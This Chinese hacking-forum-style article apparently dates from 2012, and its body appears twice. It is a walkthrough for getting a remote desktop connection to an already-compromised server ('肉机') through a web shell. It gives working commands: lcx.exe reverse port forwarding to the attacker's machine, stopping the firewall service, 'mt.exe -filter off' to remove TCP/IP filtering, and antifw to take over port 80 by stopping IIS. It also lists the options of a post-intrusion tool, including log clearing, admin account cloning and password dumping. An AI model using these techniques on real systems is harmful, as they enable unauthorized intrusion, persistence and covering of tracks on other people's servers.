开了3389后WEB渗透远程连接不上的分析与解决
发布时间:2012-06-07 08:19:20 作者:佚名 我要评论
3389开了后.有时候远程连接不上.我们来分析一下
对于开了3389,连接不上,有几个方面的原因,我来总结下,哇咔咔,这几天提好几台服务器都TM这样,分析下,
原因1、远程桌面端口被更改。2、对方服务器处于内网。3、防火墙拦截。4、TCP/IP安全限制。
好了,知道原因了,我们来一个一个思考解决方法(部分引用):
远程桌面端口被更改解决方法:
现在一般的asp大马都有探测服务器的功能,在权限还行的情况下都可以直接查看远程(Terminal Service)端口,或者可以查看注册表也可以得到远程桌面端口,asp权限不行,在支持aspx的时候就换aspx查看注册表。
对方服务器处于内网解决方法:
这种情况我们可以使用lcx做端口转发,不知道的或者没有的就百度“lcx.exe下载”,我就不提供下载了。
使用方法:
1.上传lcx.exe到目标服务器可执行目录
2.本地主机启动lcx.exe监听,命令:
lcx.exe -listen 1988 4567 // 监听1988端口并转发到4567端口
在目标主机运行:
格式为:
lcx.exe -slave 你的IP 你监听的端口 肉机IP 要转发的目标主机端口
例子:lcx.exe -slave 192.168.86.1 1988 192.168.86.3 3389
3.本地链接:127.0.0.1:1988
OK,有点小麻烦,不过还是很管用的,要是你也是内网,你就做下端口映射就好了,映射到转发回来的端口,哇咔咔。
4、防火墙拦截解决办法:
一般还是先试试端口转发,还是利用LCX,
使用方法:
lcx.exe -slave 你的IP 你监听的端口 肉机 要转发的目标主机端口
例子:lcx.exe -slave 192.168.86.1 1988 192.168.86.3 3389
然后本地连接:127.0.0.1:1988 就搞定了。
如果还不行。。要是web是SYSTEM权限,直接停掉防火墙服务就没问题了。
5、TCP/IP安全策略限制。
这个解决方法就有点多了,可以使用MT.EXE来关闭策略,
使用方法:
1.上传mt.exe到目标服务器可执行目录
2.执行命令:mt.exe -filter off
这样就关闭了TCP/IP限制了
选项:
-filter —更改TCP/IP 过滤器的开头状态
-addport —添加端口到过滤器的允许列表
-setport —设置端口作为过滤器的允许列表
-nicinfo —列出TCP/IP 界面信息
-pslist —列出活动进程
-pskill —杀毒指定进程
-dlllist —列出指定进程的DLL
-sysinfo —列出系统信息
-shutdown —关闭系统
-reboot —重启系统
-poweroff —关闭电源
-logoff —注销当前用户会话
-chkts —检查终端服务信息
-setupts —安装终端服务
-remts —卸载终端服务
-chgtsp —重置终端服务端口
-clog —清除系统日志
-enumsrv —列出所有服务
-querysrv —列出指定服务的详细信息
-instsrv —安装一个服务
-cfgsrv —更改服务配置
-remsrv —卸载指定服务
-startsrv —启动指定服务
-stopsrv —停止指定服务
-netget —从http/ftp 下载
-redirect —端口重定向
-chkuser —列出所有账户、sid 和anti 克隆
-clone —克隆admin 到目标
-never —设置账户看上去从未登录
-killuser —删除账户,甚至是 “guest” 也可删除
-su —以Local_System 权限运行进程
-findpass —显示所有已登录用户的口令
-netstat —列出TCP 连接
-killtcp —杀死TCP 连接
-psport —映射端口到进程
-touch —设置文件日期和时间到指定值
-secdel —安全擦除文件或目录占用的空间
-regshell —进入一个控制台注册表编辑器
-chkdll —检测gina dll 后门
上面只是一种方法,再说一种好用的方法吧,成功率灰常高,哇咔咔。
使用antifw.exe这个工具,
使用方法:
在cmd下输入
antifw -s 运行程序 停止iis将3389改为80
antifw -l 关闭程序。恢复iis
连接的时候直接连接他的80端口就OK了,内网外网通杀!成功率比较高。但是这样他网站就访问不了。。。
没事,上去了我们赶紧分析原因,排除万难,把限制去掉,再给他还原80端口,哇咔咔。。。
By:Seay
原因1、远程桌面端口被更改。2、对方服务器处于内网。3、防火墙拦截。4、TCP/IP安全限制。
好了,知道原因了,我们来一个一个思考解决方法(部分引用):
远程桌面端口被更改解决方法:
现在一般的asp大马都有探测服务器的功能,在权限还行的情况下都可以直接查看远程(Terminal Service)端口,或者可以查看注册表也可以得到远程桌面端口,asp权限不行,在支持aspx的时候就换aspx查看注册表。
对方服务器处于内网解决方法:
这种情况我们可以使用lcx做端口转发,不知道的或者没有的就百度“lcx.exe下载”,我就不提供下载了。
使用方法:
1.上传lcx.exe到目标服务器可执行目录
2.本地主机启动lcx.exe监听,命令:
lcx.exe -listen 1988 4567 // 监听1988端口并转发到4567端口
在目标主机运行:
格式为:
lcx.exe -slave 你的IP 你监听的端口 肉机IP 要转发的目标主机端口
例子:lcx.exe -slave 192.168.86.1 1988 192.168.86.3 3389
3.本地链接:127.0.0.1:1988
OK,有点小麻烦,不过还是很管用的,要是你也是内网,你就做下端口映射就好了,映射到转发回来的端口,哇咔咔。
4、防火墙拦截解决办法:
一般还是先试试端口转发,还是利用LCX,
使用方法:
lcx.exe -slave 你的IP 你监听的端口 肉机 要转发的目标主机端口
例子:lcx.exe -slave 192.168.86.1 1988 192.168.86.3 3389
然后本地连接:127.0.0.1:1988 就搞定了。
如果还不行。。要是web是SYSTEM权限,直接停掉防火墙服务就没问题了。
5、TCP/IP安全策略限制。
这个解决方法就有点多了,可以使用MT.EXE来关闭策略,
使用方法:
1.上传mt.exe到目标服务器可执行目录
2.执行命令:mt.exe -filter off
这样就关闭了TCP/IP限制了
选项:
-filter —更改TCP/IP 过滤器的开头状态
-addport —添加端口到过滤器的允许列表
-setport —设置端口作为过滤器的允许列表
-nicinfo —列出TCP/IP 界面信息
-pslist —列出活动进程
-pskill —杀毒指定进程
-dlllist —列出指定进程的DLL
-sysinfo —列出系统信息
-shutdown —关闭系统
-reboot —重启系统
-poweroff —关闭电源
-logoff —注销当前用户会话
-chkts —检查终端服务信息
-setupts —安装终端服务
-remts —卸载终端服务
-chgtsp —重置终端服务端口
-clog —清除系统日志
-enumsrv —列出所有服务
-querysrv —列出指定服务的详细信息
-instsrv —安装一个服务
-cfgsrv —更改服务配置
-remsrv —卸载指定服务
-startsrv —启动指定服务
-stopsrv —停止指定服务
-netget —从http/ftp 下载
-redirect —端口重定向
-chkuser —列出所有账户、sid 和anti 克隆
-clone —克隆admin 到目标
-never —设置账户看上去从未登录
-killuser —删除账户,甚至是 “guest” 也可删除
-su —以Local_System 权限运行进程
-findpass —显示所有已登录用户的口令
-netstat —列出TCP 连接
-killtcp —杀死TCP 连接
-psport —映射端口到进程
-touch —设置文件日期和时间到指定值
-secdel —安全擦除文件或目录占用的空间
-regshell —进入一个控制台注册表编辑器
-chkdll —检测gina dll 后门
上面只是一种方法,再说一种好用的方法吧,成功率灰常高,哇咔咔。
使用antifw.exe这个工具,
使用方法:
在cmd下输入
antifw -s 运行程序 停止iis将3389改为80
antifw -l 关闭程序。恢复iis
连接的时候直接连接他的80端口就OK了,内网外网通杀!成功率比较高。但是这样他网站就访问不了。。。
没事,上去了我们赶紧分析原因,排除万难,把限制去掉,再给他还原80端口,哇咔咔。。。
By:Seay
相关文章
局域网共享安全方式之用局域网文件共享系统实现共享文件夹安全设置
现在很多单位都有文件服务器,经常会共享文件让局域网用户访问。那么,如何才能保护局域网内共享文件夹的安全性呢?下面通过本文给大家分享局域网共享安全方式之用局域网文2017-05-11- 这篇文章主要介绍了IIS的FastCGI漏洞处理方法,需要的朋友可以参考下2017-04-30
IIS PHP fastcgi模式 pathinfo取值错误任意代码执行漏洞修复方法
这篇文章主要介绍了PHP fastcgi模式 pathinfo取值错误任意代码执行漏洞,需要的朋友可以参考下2017-04-30- IIS短文件名泄露漏洞,IIS上实现上存在文件枚举漏洞,攻击者可利用此漏洞枚举获取服务器根目录中的文件,这里为大家分享一下安装方法,需要的朋友可以参考下2017-04-23
用mcafee麦咖啡设置服务器基本用户安全(防止新建用户与修改密码)
这篇文章主要介绍了用麦咖啡设置服务器基本用户安全(防止新建用户与修改密码),需要的朋友可以参考下2017-02-26- 这篇文章主要介绍了防范黑客入侵,关闭端口封锁大门 黑客无法入侵的相关资料,需要的朋友可以参考下2016-10-31
- 大家都知道现在市场上的网络性能监控工具大有所在,这为现在的IT行业的人员提供了很多便利,帮助IT管理团队监控网络性能,并且帮助IT管理人员确定系统性能的瓶颈所在,进而2016-10-19
- 虽然现在网络很发达,但对我们普通人而言,也就是10多年的上网历史,好多人还没意识到信息安全的重要性。那么如何保证自己的上网安全?下面小编为大家分享10条防范自救,一2016-10-12
- 这篇文章主要介绍了远离病毒 八项基本原则的相关资料,需要的朋友可以参考下2016-10-08
- 这篇文章主要介绍了Linux 防范病毒的方法的相关资料,需要的朋友可以参考下2016-10-08
最新评论